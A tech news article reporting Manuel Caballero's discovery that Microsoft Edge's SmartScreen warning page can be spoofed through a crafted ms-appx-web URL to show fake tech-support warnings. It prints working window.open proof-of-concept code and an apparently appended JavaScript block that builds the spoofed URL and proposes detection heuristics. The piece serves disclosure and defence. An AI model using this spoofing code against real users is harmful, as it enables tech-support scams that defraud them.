Here’s how scammers can trick Microsoft Edge into displaying fake security warnings

It’s become a depressingly predictable feature of modern Internet browsing: You’re clicking on a Google link to a well-known site – and suddenly a message pops up, warning that your computer might be at risk and to call a number for “technical support.”

Regular ITBusiness.ca readers, of course, aren't about to call one of those numbers, but Argentinian researcher Manuel Caballero has discovered how the legitimate Microsoft SmartScreen warning page displayed by Microsoft Edge, the Windows 10 browser, can be made to deliver exactly such a message simply by crafting the right URL.

Here’s the default screen, triggered by accessing Microsoft Corp.’s own malware test page:

[Image: the genuine Microsoft Edge SmartScreen warning]

However, as Caballero noted, the URL at the top obviously doesn’t match the content being displayed, which led him to dig for – and, after some trial and error, discover – the actual URL for the warning page:

ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite.htm

As Caballero acknowledges, typing that URL into the address bar simply sends you to your default search engine. Getting around that takes only rudimentary coding, however, and reading Caballero's sample changes it is easy to see how a web page could make Edge display its own block page for a perfectly legitimate website.

Step one: replace the period in ".htm" with its percent-encoded form, %2E (2E being the hexadecimal ASCII code of the period):

BlockSite%2Ehtm

With the period encoded, the address is no longer diverted to search, and a URL fragment (the part after the #) carrying whatever address the attacker wants can be appended to it, something as innocuous as Facebook's, for example:

// Step one: the percent-encoded dot plus a fragment holding the address to display
window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm"+
"#http://www.facebook.com"
);

“So we can now open a very ugly webpage with a spoofed URL,” Caballero writes. “But BlockSite.htm is getting a couple of arguments (BlockedDomain and Host) from the location.search. Let’s use them!”

Which brings us to step two. In the code below, Caballero passes "BlockedDomain" as "facebook.com" and "Host" as "Technical Support Really Super Legit CALL NOW: 800-111-2222", the two query-string arguments the page reads from location.search:

// Step two: BlockedDomain and Host are read from location.search; the fragment is the spoofed address
window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?"+
"BlockedDomain=facebook.com&Host=Technical Support Really Super Legit CALL NOW\:"+
"800-111-2222#http://www.facebook.com");

“As a bonus, when we place a telephone-like number, a link is automatically created so the user can call us with a single click,” Caballero notes. “Very convenient for these scammers.”
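The two steps above, worked end to end as an added JavaScript example (this is not Caballero's code, and nothing in it is Microsoft's): it builds the spoofed BlockSite.htm address, reads it back the way an error page reading location.search and location.hash would, and then flags the tell-tale signs a defender could look for. It runs under Node.js using the standard WHATWG URL parser. The detection function looksLikeBlockSiteSpoof and its three heuristics are my assumptions for illustration, not a check Edge performs.

```javascript
// Added example, not Caballero's code: build the spoofed BlockSite URL as the
// two steps above describe, read it back the way the error page reads
// location.search, and flag what a defender could look for. Node.js only.

// The genuine error-page address Caballero found.
const BLOCKSITE = "ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite.htm";

// Step one: swap the period in ".htm" for its percent-encoded form, %2E.
function encodeDot(url) {
  return url.replace(/\.htm$/i, "%2ehtm");
}

// Step two: append BlockedDomain and Host as query arguments, then the
// address to be spoofed as the fragment. The arguments go in raw, exactly as
// in Caballero's snippet; the URL parser percent-encodes the spaces later.
function buildSpoofedUrl({ blockedDomain, host, displayUrl }) {
  return `${encodeDot(BLOCKSITE)}?BlockedDomain=${blockedDomain}&Host=${host}#${displayUrl}`;
}

// What BlockSite.htm would see: the two arguments from location.search and
// the fragment from location.hash (searchParams hands values back decoded).
function readBlockSiteArgs(urlString) {
  const u = new URL(urlString);
  return {
    blockedDomain: u.searchParams.get("BlockedDomain"),
    host: u.searchParams.get("Host"),
    fragment: u.hash.slice(1),
  };
}

// Hypothetical detection heuristic (an assumption of this example, not a
// Microsoft check): a URL that resolves to BlockSite.htm but (a) reaches it
// through a percent-encoded path, (b) carries a URL in its fragment, or
// (c) puts a phone-like number in Host (which Edge auto-links, per
// Caballero) is suspicious. Returns the reasons found; empty means clean.
function looksLikeBlockSiteSpoof(urlString) {
  const reasons = [];
  let u, decodedPath;
  try {
    u = new URL(urlString);
    decodedPath = decodeURIComponent(u.pathname);
  } catch (e) {
    return reasons; // unparsable or malformed escapes: not this spoof
  }
  if (u.protocol !== "ms-appx-web:" || u.hostname !== "microsoft.microsoftedge") return reasons;
  if (!decodedPath.toLowerCase().endsWith("/assets/errorpages/blocksite.htm")) return reasons;

  if (decodedPath !== u.pathname) reasons.push("path reaches BlockSite.htm via percent-encoding");
  if (/^#[a-z][a-z0-9+.-]*:\/\//i.test(u.hash)) reasons.push("fragment carries a URL");
  const host = u.searchParams.get("Host") || "";
  if (/\d{3}[\s.-]?\d{3}[\s.-]?\d{4}/.test(host)) reasons.push("Host contains a phone-like number");
  return reasons;
}

// Walk through the article's own example values.
const spoofed = buildSpoofedUrl({
  blockedDomain: "facebook.com",
  host: "Technical Support Really Super Legit CALL NOW:800-111-2222",
  displayUrl: "http://www.facebook.com",
});
console.log(spoofed);
console.log(readBlockSiteArgs(spoofed));
console.log(looksLikeBlockSiteSpoof(spoofed));   // three reasons
console.log(looksLikeBlockSiteSpoof(BLOCKSITE)); // [] for the genuine address
```

Note that the genuine address, with its literal period and no query or fragment, produces no findings, while the crafted one trips all three heuristics; the phone-number check is the weakest of the three, since a legitimate Host value could in principle contain digits, so in practice it should only add weight to the other two.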

Over at Internet security firm Bitdefender’s news site, Hot for Security, contributor Graham Cluley connects the dots for readers, showing which parts of Caballero’s code would be displayed, and where.

[Image: Cluley's annotated screenshot showing where each part of Caballero's code appears in the fake warning]

“If a scammer was to exploit this bug they would be able to display native, legitimate-looking warning messages that would be more likely to trick unsuspecting computer users into believing their computer was at risk and making poor decisions,” Cluley writes.

See the results for yourself:

[Image: the spoofed SmartScreen warning as rendered by Edge]

When contacted about the vulnerability, a Microsoft spokesperson told ITBusiness.ca in an email that “Windows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible.”

“Our standard policy is to provide solutions via our current Update Tuesday schedule,” the spokesperson wrote.

Though Bitdefender's Cluley thinks it likely that Microsoft will fix this vulnerability, it remains a potent illustration of the lengths technical support scammers will go to in their attempts to fool unsuspecting users. And while you might be too savvy to fall for their tricks, he notes, that doesn't mean your friends, family and colleagues are.


Eric Emin Wood
Former editor of ITBusiness.ca turned consultant with public relations firm Porter Novelli. When not writing for the tech industry enjoys photography, movies, travelling, the Oxford comma, and will talk your ear off about animation if you give him an opening.